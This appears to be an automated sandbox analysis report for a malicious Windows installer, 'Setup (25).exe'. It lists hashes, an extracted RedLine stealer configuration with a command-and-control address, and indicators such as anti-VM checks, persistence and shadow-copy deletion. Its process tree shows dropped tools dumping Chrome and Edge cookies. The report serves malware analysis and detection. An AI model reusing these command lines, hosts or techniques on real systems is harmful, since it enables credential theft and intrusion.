Overview
overview
10Static
static
Setup (1).exe
windows10_x64
10Setup (10).exe
windows10_x64
10Setup (11).exe
windows10_x64
10Setup (12).exe
windows10_x64
10Setup (13).exe
windows10_x64
10Setup (14).exe
windows10_x64
10Setup (15).exe
windows10_x64
10Setup (16).exe
windows10_x64
10Setup (17).exe
windows10_x64
10Setup (18).exe
windows10_x64
10Setup (19).exe
windows10_x64
10Setup (2).exe
windows10_x64
10Setup (20).exe
windows10_x64
10Setup (21).exe
windows10_x64
10Setup (22).exe
windows10_x64
10Setup (23).exe
windows10_x64
10Setup (24).exe
windows10_x64
10Setup (25).exe
windows10_x64
10Setup (26).exe
windows10_x64
10Setup (27).exe
windows10_x64
10Setup (28).exe
windows10_x64
10Setup (29).exe
windows10_x64
10Setup (3).exe
windows10_x64
10Setup (30).exe
windows10_x64
10Setup (31).exe
windows10_x64
10Setup (4).exe
windows10_x64
10Setup (5).exe
windows10_x64
10Setup (6).exe
windows10_x64
10Setup (7).exe
windows10_x64
10Setup (8).exe
windows10_x64
10Setup (9).exe
windows10_x64
10Setup.exe
windows10_x64
10Resubmissions
15/10/2024, 15:36
241015-s1zlzasdkc 1001/07/2024, 18:32
240701-w6yteawhmq 1001/07/2024, 14:52
240701-r82wmaxdnd 1001/07/2024, 14:52
240701-r8syqa1dpp 1011/03/2024, 21:22
240311-z8dsssgg58 1001/09/2021, 13:18
210901-5bmxjspa5s 1001/09/2021, 13:04
210901-te4btfspqa 1001/09/2021, 05:12
210901-4wnkwm1p3j 1031/08/2021, 21:47
210831-41rp97dma2 10Analysis
-
max time kernel
164s -
max time network
1811s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
24/08/2021, 20:54
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win10v20210410
Behavioral task
behavioral2
Sample
Setup (10).exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
Setup (11).exe
Resource
win10v20210408
Behavioral task
behavioral4
Sample
Setup (12).exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
Setup (13).exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
Setup (14).exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
Setup (15).exe
Resource
win10v20210410
Behavioral task
behavioral8
Sample
Setup (16).exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
Setup (17).exe
Resource
win10v20210410
Behavioral task
behavioral10
Sample
Setup (18).exe
Resource
win10v20210408
Behavioral task
behavioral11
Sample
Setup (19).exe
Resource
win10v20210410
Behavioral task
behavioral12
Sample
Setup (2).exe
Resource
win10v20210408
Behavioral task
behavioral13
Sample
Setup (20).exe
Resource
win10v20210410
Behavioral task
behavioral14
Sample
Setup (21).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
Setup (22).exe
Resource
win10v20210408
Behavioral task
behavioral16
Sample
Setup (23).exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
Setup (24).exe
Resource
win10v20210408
Behavioral task
behavioral18
Sample
Setup (25).exe
Resource
win10v20210410
Behavioral task
behavioral19
Sample
Setup (26).exe
Resource
win10v20210408
Behavioral task
behavioral20
Sample
Setup (27).exe
Resource
win10v20210410
Behavioral task
behavioral21
Sample
Setup (28).exe
Resource
win10v20210410
Behavioral task
behavioral22
Sample
Setup (29).exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
Setup (3).exe
Resource
win10v20210410
Behavioral task
behavioral24
Sample
Setup (30).exe
Resource
win10v20210408
Behavioral task
behavioral25
Sample
Setup (31).exe
Resource
win10v20210410
Behavioral task
behavioral26
Sample
Setup (4).exe
Resource
win10v20210408
Behavioral task
behavioral27
Sample
Setup (5).exe
Resource
win10v20210410
Behavioral task
behavioral28
Sample
Setup (6).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
Setup (7).exe
Resource
win10v20210408
Behavioral task
behavioral30
Sample
Setup (8).exe
Resource
win10v20210410
Behavioral task
behavioral31
Sample
Setup (9).exe
Resource
win10v20210408
Behavioral task
behavioral32
Sample
Setup.exe
Resource
win10v20210410
General
-
Target
Setup (25).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
supertraff
135.148.139.222:1494
Extracted
redline
dibild2
135.148.139.222:1494
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral18/memory/1580-403-0x00000000050B0000-0x00000000059D6000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6032 4440 rundll32.exe 143 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2248 4440 rundll32.exe 143 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3020 4440 rundll32.exe 143 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4836 4440 rundll32.exe 143 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
resource yara_rule behavioral18/files/0x000100000001aba4-140.dat family_redline behavioral18/files/0x000100000001aba4-189.dat family_redline behavioral18/memory/4868-274-0x000000000041A616-mapping.dmp family_redline behavioral18/memory/5112-307-0x000000000041A76A-mapping.dmp family_redline behavioral18/memory/4868-271-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral18/memory/5112-330-0x0000000005440000-0x000000000593E000-memory.dmp family_redline -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral18/memory/1920-400-0x0000000004950000-0x00000000049ED000-memory.dmp family_vidar -
Blocklisted process makes network request 3 IoCs
flow pid Process 147 4836 rundll32.exe 150 4836 rundll32.exe 156 4836 rundll32.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 39 IoCs
pid Process 3924 hhWSowo56ICH5Ct16_uDvViF.exe 1800 mah7ahHqr_vjx0vrQ37YCHAD.exe 1448 mwEOhluSw0mfDbqmPZCcZKms.exe 2668 4tyIUkvpHdBTXMfrt6Q9KPl8.exe 2688 haQopfVIAQr4qq3pQM_0dwtd.exe 2316 fTYCIa4eOgEhVJfKlKbYVDKT.exe 2520 I99YptBkWxx9pT4JWVCVfIPO.exe 1580 r8wK8miXIew0GxPB_M3SqNYt.exe 3948 7u_7a9fRpOJFj9_7K6FfqV7A.exe 2692 IQp3iOsR3ggTRvROqmeyfMXx.exe 3128 yCWmc1V30o6dlR0xii5erM2K.exe 2948 0HZX1v2M4nK4m4r3L_ILsrOi.exe 2352 6CTbj_PvPVwmC0UoxinDcC8i.exe 2724 KkjvE1gBgcSCLctD3FV4gePo.exe 4084 lW0NRBt72kgGuEXqrfYFIJs1.exe 2444 22oiVanbooF8DL_R5SnjI4Vq.exe 3952 RImJ90i5WyDa_CR9AVZ5npoI.exe 3896 PNlW9Ynw3hrZheQ4fo5oW07r.exe 3396 rbBrlVBwQcaFGA2vxwRmNn5Q.exe 372 cBnlvjc97Cmm56_CDemU1Bs1.exe 1920 7bafckZ5rtgPIZJG86zfVdHi.exe 3240 cyBfhO12Wuh6n7rG4xU4H8tZ.exe 960 dAmLdVeL5Xdxup5rhoQ_CCty.exe 2180 LyMjURO0cyxMA3cQmPaS6KGJ.exe 4380 customer3.exe 4420 md8_8eus.exe 4468 jooyu.exe 4632 ERJcaxlU8Orr_cChsgDRUkUD.exe 4836 rundll32.exe 5008 fTYCIa4eOgEhVJfKlKbYVDKT.exe 4868 hhWSowo56ICH5Ct16_uDvViF.exe 4936 lW0NRBt72kgGuEXqrfYFIJs1.exe 5112 lW0NRBt72kgGuEXqrfYFIJs1.exe 1968 4335780.exe 696 6543320.exe 1200 8663287.exe 2792 WerFault.exe 4056 8052593.exe 2648 WO~L~OYJWS8EVL1.eXe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0HZX1v2M4nK4m4r3L_ILsrOi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0HZX1v2M4nK4m4r3L_ILsrOi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion yCWmc1V30o6dlR0xii5erM2K.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion yCWmc1V30o6dlR0xii5erM2K.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7u_7a9fRpOJFj9_7K6FfqV7A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7u_7a9fRpOJFj9_7K6FfqV7A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cyBfhO12Wuh6n7rG4xU4H8tZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cyBfhO12Wuh6n7rG4xU4H8tZ.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Setup (25).exe -
Loads dropped DLL 3 IoCs
pid Process 2724 KkjvE1gBgcSCLctD3FV4gePo.exe 4836 rundll32.exe 4836 rundll32.exe -
resource yara_rule behavioral18/files/0x000100000001abb0-147.dat themida behavioral18/files/0x000100000001aba2-148.dat themida behavioral18/files/0x000100000001abac-144.dat themida behavioral18/files/0x000100000001ab8e-173.dat themida behavioral18/files/0x000100000001abb0-194.dat themida behavioral18/files/0x000100000001abac-196.dat themida behavioral18/files/0x000100000001ab8e-199.dat themida behavioral18/files/0x000100000001aba2-190.dat themida behavioral18/memory/2948-257-0x0000000000B70000-0x0000000000B71000-memory.dmp themida behavioral18/memory/3948-261-0x0000000000110000-0x0000000000111000-memory.dmp themida behavioral18/memory/3128-262-0x0000000001320000-0x0000000001321000-memory.dmp themida behavioral18/memory/3240-258-0x0000000001060000-0x0000000001061000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 6543320.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0HZX1v2M4nK4m4r3L_ILsrOi.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA yCWmc1V30o6dlR0xii5erM2K.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cyBfhO12Wuh6n7rG4xU4H8tZ.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7u_7a9fRpOJFj9_7K6FfqV7A.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 20 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 28 ipinfo.io 143 ip-api.com 218 freegeoip.app 225 ipinfo.io 614 geoiptool.com 647 freegeoip.app 29 ipinfo.io 146 ipinfo.io 228 freegeoip.app 229 ipinfo.io 241 ipinfo.io 393 ipinfo.io 150 ipinfo.io 219 freegeoip.app 232 ipinfo.io 391 ipinfo.io 215 freegeoip.app 236 ipinfo.io 416 ip-api.com 648 freegeoip.app -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2948 0HZX1v2M4nK4m4r3L_ILsrOi.exe 3128 yCWmc1V30o6dlR0xii5erM2K.exe 3240 cyBfhO12Wuh6n7rG4xU4H8tZ.exe 3948 7u_7a9fRpOJFj9_7K6FfqV7A.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3924 set thread context of 4868 3924 hhWSowo56ICH5Ct16_uDvViF.exe 120 PID 4084 set thread context of 5112 4084 lW0NRBt72kgGuEXqrfYFIJs1.exe 124 -
Drops file in Program Files directory 5 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe 4tyIUkvpHdBTXMfrt6Q9KPl8.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe 4tyIUkvpHdBTXMfrt6Q9KPl8.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe 4tyIUkvpHdBTXMfrt6Q9KPl8.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe 4tyIUkvpHdBTXMfrt6Q9KPl8.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini 4tyIUkvpHdBTXMfrt6Q9KPl8.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 33 IoCs
pid pid_target Process procid_target 4940 1800 WerFault.exe 84 4232 1800 WerFault.exe 84 652 1800 WerFault.exe 84 2792 1800 WerFault.exe 84 5264 372 WerFault.exe 98 5672 1580 WerFault.exe 85 5168 1800 WerFault.exe 84 5828 1920 WerFault.exe 108 6044 1580 WerFault.exe 85 6016 1920 WerFault.exe 108 5936 1580 WerFault.exe 85 6108 1920 WerFault.exe 108 2164 1920 WerFault.exe 108 4816 1580 WerFault.exe 85 1136 1920 WerFault.exe 108 5744 1920 WerFault.exe 108 2656 1580 WerFault.exe 85 6308 1920 WerFault.exe 108 6468 1580 WerFault.exe 85 6556 1920 WerFault.exe 108 6832 1920 WerFault.exe 108 7016 1580 WerFault.exe 85 1812 5724 WerFault.exe 150 6628 1920 WerFault.exe 108 6240 5724 WerFault.exe 150 6240 5724 WerFault.exe 150 7456 5724 WerFault.exe 150 7528 1920 WerFault.exe 108 8144 1920 WerFault.exe 108 6296 5724 WerFault.exe 150 8012 5724 WerFault.exe 150 6388 7564 WerFault.exe 243 864 6996 WerFault.exe 212 -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5772 schtasks.exe 10752 schtasks.exe 4152 schtasks.exe 6600 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 10840 vssadmin.exe 6360 vssadmin.exe -
Kills process with taskkill 8 IoCs
pid Process 3880 taskkill.exe 9040 taskkill.exe 9784 taskkill.exe 8768 taskkill.exe 3192 taskkill.exe 5444 taskkill.exe 7232 taskkill.exe 7888 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Setup (25).exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Setup (25).exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 8352 PING.EXE 8536 PING.EXE 9288 PING.EXE -
Script User-Agent 8 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 147 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 150 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 156 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 226 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 230 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 239 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 392 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 396 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 60 IoCs
pid Process 1716 Setup (25).exe 1716 Setup (25).exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4940 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 4232 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe 652 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 2724 KkjvE1gBgcSCLctD3FV4gePo.exe Token: SeDebugPrivilege 3396 rbBrlVBwQcaFGA2vxwRmNn5Q.exe Token: SeDebugPrivilege 2692 IQp3iOsR3ggTRvROqmeyfMXx.exe Token: SeRestorePrivilege 4940 WerFault.exe Token: SeBackupPrivilege 4940 WerFault.exe Token: SeDebugPrivilege 4940 WerFault.exe Token: SeDebugPrivilege 2520 I99YptBkWxx9pT4JWVCVfIPO.exe Token: SeDebugPrivilege 5112 lW0NRBt72kgGuEXqrfYFIJs1.exe Token: SeDebugPrivilege 4232 WerFault.exe Token: SeDebugPrivilege 4868 hhWSowo56ICH5Ct16_uDvViF.exe Token: SeDebugPrivilege 2948 0HZX1v2M4nK4m4r3L_ILsrOi.exe Token: SeDebugPrivilege 3240 cyBfhO12Wuh6n7rG4xU4H8tZ.exe Token: SeDebugPrivilege 3948 7u_7a9fRpOJFj9_7K6FfqV7A.exe Token: SeDebugPrivilege 1968 4335780.exe Token: SeDebugPrivilege 652 WerFault.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4836 rundll32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1716 wrote to memory of 1580 1716 Setup (25).exe 85 PID 1716 wrote to memory of 1580 1716 Setup (25).exe 85 PID 1716 wrote to memory of 1580 1716 Setup (25).exe 85 PID 1716 wrote to memory of 3948 1716 Setup (25).exe 82 PID 1716 wrote to memory of 3948 1716 Setup (25).exe 82 PID 1716 wrote to memory of 3948 1716 Setup (25).exe 82 PID 1716 wrote to memory of 1448 1716 Setup (25).exe 83 PID 1716 wrote to memory of 1448 1716 Setup (25).exe 83 PID 1716 wrote to memory of 1448 1716 Setup (25).exe 83 PID 1716 wrote to memory of 1800 1716 Setup (25).exe 84 PID 1716 wrote to memory of 1800 1716 Setup (25).exe 84 PID 1716 wrote to memory of 1800 1716 Setup (25).exe 84 PID 1716 wrote to memory of 3924 1716 Setup (25).exe 81 PID 1716 wrote to memory of 3924 1716 Setup (25).exe 81 PID 1716 wrote to memory of 3924 1716 Setup (25).exe 81 PID 1716 wrote to memory of 2668 1716 Setup (25).exe 80 PID 1716 wrote to memory of 2668 1716 Setup (25).exe 80 PID 1716 wrote to memory of 2668 1716 Setup (25).exe 80 PID 1716 wrote to memory of 2688 1716 Setup (25).exe 79 PID 1716 wrote to memory of 2688 1716 Setup (25).exe 79 PID 1716 wrote to memory of 2688 1716 Setup (25).exe 79 PID 1716 wrote to memory of 2316 1716 Setup (25).exe 91 PID 1716 wrote to memory of 2316 1716 Setup (25).exe 91 PID 1716 wrote to memory of 2316 1716 Setup (25).exe 91 PID 1716 wrote to memory of 2520 1716 Setup (25).exe 92 PID 1716 wrote to memory of 2520 1716 Setup (25).exe 92 PID 1716 wrote to memory of 2520 1716 Setup (25).exe 92 PID 1716 wrote to memory of 2692 1716 Setup (25).exe 94 PID 1716 wrote to memory of 2692 1716 Setup (25).exe 94 PID 1716 wrote to memory of 2948 1716 Setup (25).exe 87 PID 1716 wrote to memory of 2948 1716 Setup (25).exe 87 PID 1716 wrote to memory of 2948 1716 Setup (25).exe 87 PID 1716 wrote to memory of 2352 1716 Setup (25).exe 89 PID 1716 wrote to memory of 2352 1716 Setup (25).exe 89 PID 1716 wrote to memory of 2352 1716 Setup (25).exe 89 PID 1716 wrote to memory of 3128 1716 Setup (25).exe 88 PID 1716 wrote to memory of 3128 1716 Setup (25).exe 88 PID 1716 wrote to memory of 3128 1716 Setup (25).exe 88 PID 1716 wrote to memory of 2724 1716 Setup (25).exe 93 PID 1716 wrote to memory of 2724 1716 Setup (25).exe 93 PID 1716 wrote to memory of 2444 1716 Setup (25).exe 96 PID 1716 wrote to memory of 2444 1716 Setup (25).exe 96 PID 1716 wrote to memory of 2444 1716 Setup (25).exe 96 PID 1716 wrote to memory of 4084 1716 Setup (25).exe 95 PID 1716 wrote to memory of 4084 1716 Setup (25).exe 95 PID 1716 wrote to memory of 4084 1716 Setup (25).exe 95 PID 1716 wrote to memory of 3952 1716 Setup (25).exe 104 PID 1716 wrote to memory of 3952 1716 Setup (25).exe 104 PID 1716 wrote to memory of 3896 1716 Setup (25).exe 99 PID 1716 wrote to memory of 3896 1716 Setup (25).exe 99 PID 1716 wrote to memory of 3896 1716 Setup (25).exe 99 PID 1716 wrote to memory of 3396 1716 Setup (25).exe 97 PID 1716 wrote to memory of 3396 1716 Setup (25).exe 97 PID 1716 wrote to memory of 3396 1716 Setup (25).exe 97 PID 1716 wrote to memory of 372 1716 Setup (25).exe 98 PID 1716 wrote to memory of 372 1716 Setup (25).exe 98 PID 1716 wrote to memory of 372 1716 Setup (25).exe 98 PID 1716 wrote to memory of 3240 1716 Setup (25).exe 109 PID 1716 wrote to memory of 3240 1716 Setup (25).exe 109 PID 1716 wrote to memory of 3240 1716 Setup (25).exe 109 PID 1716 wrote to memory of 1920 1716 Setup (25).exe 108 PID 1716 wrote to memory of 1920 1716 Setup (25).exe 108 PID 1716 wrote to memory of 1920 1716 Setup (25).exe 108 PID 1716 wrote to memory of 960 1716 Setup (25).exe 112
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (25).exe"C:\Users\Admin\AppData\Local\Temp\Setup (25).exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Users\Admin\Documents\haQopfVIAQr4qq3pQM_0dwtd.exe"C:\Users\Admin\Documents\haQopfVIAQr4qq3pQM_0dwtd.exe"2⤵
- Executes dropped EXE
PID:2688
-
-
C:\Users\Admin\Documents\4tyIUkvpHdBTXMfrt6Q9KPl8.exe"C:\Users\Admin\Documents\4tyIUkvpHdBTXMfrt6Q9KPl8.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2668 -
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
PID:4380 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7824
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"4⤵PID:7964
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4760
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:8200
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:8752
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:8804
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:8768
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:8924
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
PID:4420
-
-
